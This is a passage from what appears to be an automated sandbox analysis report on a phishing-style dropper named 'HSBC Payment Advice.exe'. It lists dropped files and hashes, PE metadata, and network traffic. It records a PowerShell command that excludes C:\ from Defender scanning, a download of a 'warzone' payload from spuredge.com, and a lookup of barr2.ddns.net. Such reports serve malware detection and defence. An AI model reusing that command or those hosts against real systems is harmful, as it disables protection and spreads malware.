                  • 38.103.244.107
                  duLT5gkRjy.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  EaCmG75WxF.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  fpvN6iDp5r.msiGet hashmaliciousBrowse
                  • 38.103.244.107
                  EaCmG75WxF.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  Se adjunta el pedido, proforma.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  Statement.htmlGet hashmaliciousBrowse
                  • 38.103.244.107
                  Michal November 23, 2021.htmlGet hashmaliciousBrowse
                  • 38.103.244.107
                  survey-1384723731.xlsGet hashmaliciousBrowse
                  • 38.103.244.107
                  Wfedtqxbgeorkwcgiehsnsjbdjghrpjtlr.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  survey-1378794827.xlsGet hashmaliciousBrowse
                  • 38.103.244.107
                  Zr26f1rL6r.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  mN2NobuuDv.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  cs.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  ORDINE + DDT A.M.F SpA.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  mal1.htmlGet hashmaliciousBrowse
                  • 38.103.244.107
                  5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  DOC5629.htmGet hashmaliciousBrowse
                  • 38.103.244.107
                  Racun je u prilogu.exeGet hashmaliciousBrowse
                  • 38.103.244.107
                  exe.exeGet hashmaliciousBrowse
                  • 38.103.244.107

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\images.exe
                  Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):111776
                  Entropy (8bit):5.9797505021512665
                  Encrypted:false
                  SSDEEP:1536:d0a5ea6eyr8W6sWZrV64JPS8K8VZBeFR1JVk0A9p:d0Ja6e86smc4JhKmZBMR1JK0A9p
                  MD5:A069E61B357F625A7B3595150412C42D
                  SHA1:5FA560D04B13DB7E0216BDA2CA5F1C3B94A8912E
                  SHA-256:0FB47A47BC025991B3ED8895AA84030DEF6E5CC538A9CEC279A73F4528D549C6
                  SHA-512:BF5C8D398A219E35048AA096C5C8F6A699EDC8FFB63570AA8678F593DA324421DFA19154A725E84F84AF266320C90A88852328EF666826A750BDC992F4DFF66F
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Virustotal, Detection: 56%, Browse
                  • Antivirus: Metadefender, Detection: 20%, Browse
                  • Antivirus: ReversingLabs, Detection: 49%
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i...d...i.Rich..i.................PE..L...&..K.....................0....................@.........................................................................t...(.......N................................................................... ... ....................................text....t.......................... ..`.data...4...........................@....rsrc...N...........................@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\ProgramData\images.exe:Zone.Identifier
                  Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview: [ZoneTransfer]....ZoneId=0
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):22268
                  Entropy (8bit):5.605280175734106
                  Encrypted:false
                  SSDEEP:384:FtCDqElDmQsq+sYhRYSBKnYjultI2j7Y9gtSJ3x+T1MarZlbAV7W3WDmZBDI+iuC:2s744KYCltZXtc0CSfw6RVW
                  MD5:76A8F16698B242D790634A3A452C6E2B
                  SHA1:99053AB5F93F1FE29FE01A5EA48FE23687FA2DF5
                  SHA-256:FC9861C453F85E3130FE483937FB57C36A30B3508397813C6E81C5F3516307AA
                  SHA-512:B501F13DA22E864C6C6FA463D430ED3520C03167E7DA6468313F5CDDD8BEC09522E5754177E8C1B55CCFB24B64B6B292B102532B0A06FA89D43C45E34EECEE14
                  Malicious:false
                  Reputation:low
                  Preview: @...e...........v.......h...W.P.M.....:...I..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkoahsjv.1ht.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tubbusjo.0kz.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\Documents\20211125\PowerShell_transcript.051829.7+5fXBbe.20211125185051.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):5072
                  Entropy (8bit):5.382415440050556
                  Encrypted:false
                  SSDEEP:96:BZ646EeN5qqDo1ZwwZ66EeN5qqDo1ZBM6UjZ66EeN5qqDo1ZKFEE8Z3:1KbKOKE
                  MD5:6BFB8157D1151FE07FEA9D44ECA37EDF
                  SHA1:2476FF605738DCEEE7AFBD7F2F59C942AB4D9183
                  SHA-256:E8683A6B7380D857B8F1912F18323981E8A851197DE7F46E8834F53AB5657757
                  SHA-512:6970864B49468B4C1496D6BFE17941AD3A6A3F945C467BF45EBDE56D58D7166E7746E87A08516830F9884DE01C8289AF97ED4FFA1543860386596FDB444969BB
                  Malicious:false
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125185053..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 051829 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 7140..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125185053..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20211125185436..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 051829 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPr

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):5.9797505021512665
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:HSBC Payment Advice.exe
                  File size:111776
                  MD5:a069e61b357f625a7b3595150412c42d
                  SHA1:5fa560d04b13db7e0216bda2ca5f1c3b94a8912e
                  SHA256:0fb47a47bc025991b3ed8895aa84030def6e5cc538a9cec279a73f4528d549c6
                  SHA512:bf5c8d398a219e35048aa096c5c8f6a699edc8ffb63570aa8678f593da324421dfa19154a725e84f84af266320c90a88852328ef666826a750bdc992f4dff66f
                  SSDEEP:1536:d0a5ea6eyr8W6sWZrV64JPS8K8VZBeFR1JVk0A9p:d0Ja6e86smc4JhKmZBMR1JK0A9p
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...d...i.Rich..i.................PE..L...&..K.....................0....................@........................

                  File Icon

                  Icon Hash:20047c7c70f0e004

                  Static PE Info

                  General

                  Entrypoint:0x4011a8
                  Entrypoint Section:.text
                  Digitally signed:true
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x4BDCF126 [Sun May 2 03:27:34 2010 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:15f2ba1f2bb76fff74223ec60bc62d7d

                  Authenticode Signature

                  Signature Valid:false
                  Signature Issuer:E=Form_pneumatha@Form_Tavernenf2.Fo, CN=Form_Replansd, OU=Form_Variabel, O=Form_PSEUD, L=Form_specialt, S=Form_bispest, C=AQ
                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                  Error Number:-2146762487
                  Not Before, Not After
                  • 11/24/2021 11:04:33 AM 11/24/2022 11:04:33 AM
                  Subject Chain
                  • E=Form_pneumatha@Form_Tavernenf2.Fo, CN=Form_Replansd, OU=Form_Variabel, O=Form_PSEUD, L=Form_specialt, S=Form_bispest, C=AQ
                  Version:3
                  Thumbprint MD5:99DF32578053FC972FD1F244233579CA
                  Thumbprint SHA-1:11E3E91B7D7A2135B9E864D5EFEBD574FA821A18
                  Thumbprint SHA-256:2BED8134662C05F42BA8B6FE9C0873AA65E6A2AB13FFFFB2377591D7C09D20FE
                  Serial:00

                  Entrypoint Preview

                  Instruction
                  push 00401994h
                  call 00007F2B9497B253h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  xor byte ptr [eax], al
                  add byte ptr [eax], al
                  inc eax
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [3980A88Fh], dh
                  add byte ptr [ebp-0C4A53BCh], dh
                  mov dword ptr [edi-48h], ecx
                  mov word ptr [edx+00000000h], fs
                  add byte ptr [eax], al
                  add dword ptr [eax], eax
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  rcl ch, FFFFFFEEh
                  add al, byte ptr [esi+6Fh]
                  jc 00007F2B9497B2CFh
                  pop edi
                  inc esp
                  imul ebp, dword ptr [ebx+6Bh], 726F7265h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  dec esp
                  xor dword ptr [eax], eax
                  push es
                  stc
                  jnle 00007F2B9497B20Bh
                  in al, dx
                  sti
                  mov dl, 49h
                  dec ebx
                  mov esp, 17291D76h
                  sub eax, 7DD6CE7Ah
                  jle 00007F2B9497B257h
                  pop esp
                  mov dl, 2Ah
                  inc edx
                  mov edi, D0385669h
                  loop 00007F2B9497B259h
                  cmp cl, byte ptr [bx-53h]
                  xor ebx, dword ptr [ecx-48EE309Ah]
                  or al, 00h
                  stosb
                  add byte ptr [eax-2Dh], ah
                  xchg eax, ebx
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  xor al, byte ptr [ecx]
                  add byte ptr [eax], al
                  dec esi
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  or al, byte ptr [eax]
                  inc esi
                  outsd
                  jc 00007F2B9497B2CFh
                  pop edi
                  push eax
                  dec eax
                  pop ecx
                  dec esp
                  dec esp
                  add byte ptr [46000C01h], cl
                  outsd
                  jc 00007F2B9497B2CFh

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x183740x28.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1b0000xa4e.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1a0000x14a0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2200x20
                  IMAGE_DIRECTORY_ENTRY_IAT0x10000xa8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x174d40x18000False0.475453694661data6.08617646952IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .data0x190000x1c340x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc0x1b0000xa4e0x1000False0.195068359375data2.1656784604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  VAV0x1b9100x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
                  RT_ICON0x1b7e00x130data
                  RT_ICON0x1b4f80x2e8data
                  RT_ICON0x1b3d00x128GLS_BINARY_LSB_FIRST
                  RT_GROUP_ICON0x1b3a00x30data
                  RT_VERSION0x1b1a00x200dataChineseTaiwan

                  Imports

                  DLLImport
                  MSVBVM60.DLLMethCallEngine, EVENT_SINK_AddRef, DllFunctionCall, EVENT_SINK_Release, EVENT_SINK_QueryInterface, __vbaExceptHandler

                  Version Infos

                  DescriptionData
                  Translation0x0404 0x04b0
                  ProductVersion1.00
                  InternalNameForm_HALVGUDB
                  FileVersion1.00
                  OriginalFilenameForm_HALVGUDB.exe
                  ProductNameForm_Dikkeror6

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  ChineseTaiwan

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  11/25/21-18:53:02.752720UDP254DNS SPOOF query response with TTL of 1 min. and no authority53609838.8.8.8192.168.2.7

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Nov 25, 2021 18:50:48.346342087 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.346391916 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:48.346503019 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.368999004 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.369026899 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:48.591464996 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:48.591680050 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.911839962 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.911871910 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:48.912266016 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:48.912343025 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.927681923 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:48.968868971 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.034470081 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.034513950 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.034595013 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.034611940 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.034662008 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.034742117 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.140517950 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.140626907 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.140726089 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.140752077 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.140801907 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.140887022 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.246818066 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.246903896 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247037888 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.247054100 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247077942 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247140884 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.247150898 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247180939 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247287035 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.247297049 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247386932 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.247488022 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247560978 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247606039 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.247617960 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247683048 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.247750044 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.247849941 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.353219032 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353311062 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353380919 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353388071 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.353406906 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353437901 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353461027 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.353508949 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.353514910 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353533983 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:50:49.353563070 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.353602886 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.354094982 CET49784443192.168.2.738.103.244.107
                  Nov 25, 2021 18:50:49.354118109 CET4434978438.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.460516930 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.460582018 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.460683107 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.464102030 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.464138985 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.681277990 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.681387901 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.689795017 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.689815044 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.690073013 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.690130949 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.691816092 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.732903004 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.893867016 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.893901110 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.894057035 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:00.894085884 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:00.894145966 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.000435114 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.000508070 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.000624895 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.000644922 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.000710964 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.000756025 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.107126951 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107188940 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107249975 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.107270002 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107323885 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.107702971 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107767105 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107800961 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.107810020 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107836962 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.107846022 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.107904911 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.107969999 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.108017921 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.108079910 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.148771048 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.148972988 CET49823443192.168.2.738.103.244.107
                  Nov 25, 2021 18:53:01.213685036 CET4434982338.103.244.107192.168.2.7
                  Nov 25, 2021 18:53:01.213769913 CET4434982338.103.244.107192.168.2.7

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Nov 25, 2021 18:50:48.214104891 CET5281653192.168.2.78.8.8.8
                  Nov 25, 2021 18:50:48.326981068 CET53528168.8.8.8192.168.2.7
                  Nov 25, 2021 18:53:00.343080044 CET5882053192.168.2.78.8.8.8
                  Nov 25, 2021 18:53:00.455828905 CET53588208.8.8.8192.168.2.7
                  Nov 25, 2021 18:53:02.707252979 CET6098353192.168.2.78.8.8.8
                  Nov 25, 2021 18:53:02.752720118 CET53609838.8.8.8192.168.2.7

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Nov 25, 2021 18:50:48.214104891 CET192.168.2.78.8.8.80x4373Standard query (0)spuredge.comA (IP address)IN (0x0001)
                  Nov 25, 2021 18:53:00.343080044 CET192.168.2.78.8.8.80x8081Standard query (0)spuredge.comA (IP address)IN (0x0001)
                  Nov 25, 2021 18:53:02.707252979 CET192.168.2.78.8.8.80x13e6Standard query (0)barr2.ddns.netA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Nov 25, 2021 18:50:48.326981068 CET8.8.8.8192.168.2.70x4373No error (0)spuredge.com38.103.244.107A (IP address)IN (0x0001)
                  Nov 25, 2021 18:53:00.455828905 CET8.8.8.8192.168.2.70x8081No error (0)spuredge.com38.103.244.107A (IP address)IN (0x0001)
                  Nov 25, 2021 18:53:02.752720118 CET8.8.8.8192.168.2.70x13e6No error (0)barr2.ddns.net194.5.97.4A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • spuredge.com

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.74978438.103.244.107443C:\Users\user\Desktop\HSBC Payment Advice.exe
                  TimestampkBytes transferredDirectionData
                  2021-11-25 17:50:48 UTC0OUTGET /warzone_JBBOxCEy72.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: spuredge.com
                  Cache-Control: no-cache
                  2021-11-25 17:50:49 UTC0INHTTP/1.1 200 OK
                  Date: Thu, 25 Nov 2021 17:50:48 GMT
                  Server: Apache
                  Last-Modified: Wed, 24 Nov 2021 19:03:36 GMT
                  Accept-Ranges: bytes
                  Content-Length: 115776
                  Connection: close
                  Content-Type: application/octet-stream
                  2021-11-25 17:50:49 UTC0INData Raw: 90 31 03 cf 80 65 33 6d 2e 69 a8 c3 32 17 22 69 13 1a de 7d b9 21 57 15 22 1f c1 fc 9e a6 32 19 7d 1e 80 92 3d 5f 34 88 f4 ac 46 9c 83 cc 5a 2d ab 30 bc 7f fb 4f d1 99 0f 64 1d b8 84 a2 d3 52 10 94 eb f0 ec 4e 74 0f 44 2c 91 51 bf 6b e4 97 11 2f 85 77 8a 53 e3 76 e8 0f 80 f8 99 62 21 6d 0e 5e 96 48 af 42 78 bb 25 a9 0e 8e 36 33 3d d6 06 ac a1 86 0a 87 0b 6e e6 c8 42 d7 bd f1 81 a0 3d 33 a9 ae 55 83 f3 78 7f 29 e8 53 f4 18 2d 7b 39 ba 0f 09 3d 3e 85 96 8a d3 61 8a 14 6e cc 73 53 69 fc 62 e7 a9 39 13 0d 10 63 2d b3 a1 3d a9 65 e7 08 15 d6 be 8f af ab db 10 e0 16 8c f8 f9 cf 68 34 8f a1 5c fd f0 d9 6c f0 3f a7 25 0c 67 f8 f8 d8 a5 c1 71 b6 e2 77 75 c4 fc 31 93 a4 f2 52 b4 90 4c 33 eb 64 36 0e dd 73 42 3a 44 b8 bd 13 a9 63 8c d0 19 0c 7f 7c 96 ca b0 d9 f7 32
                  Data Ascii: 1e3m.i2"i}!W"2}=_4FZ-0OdRNtD,Qk/wSvb!m^HBx%63=nB=3Ux)S-{9=>ansSib9c-=eh4\l?%gqwu1RL3d6sB:Dc|2
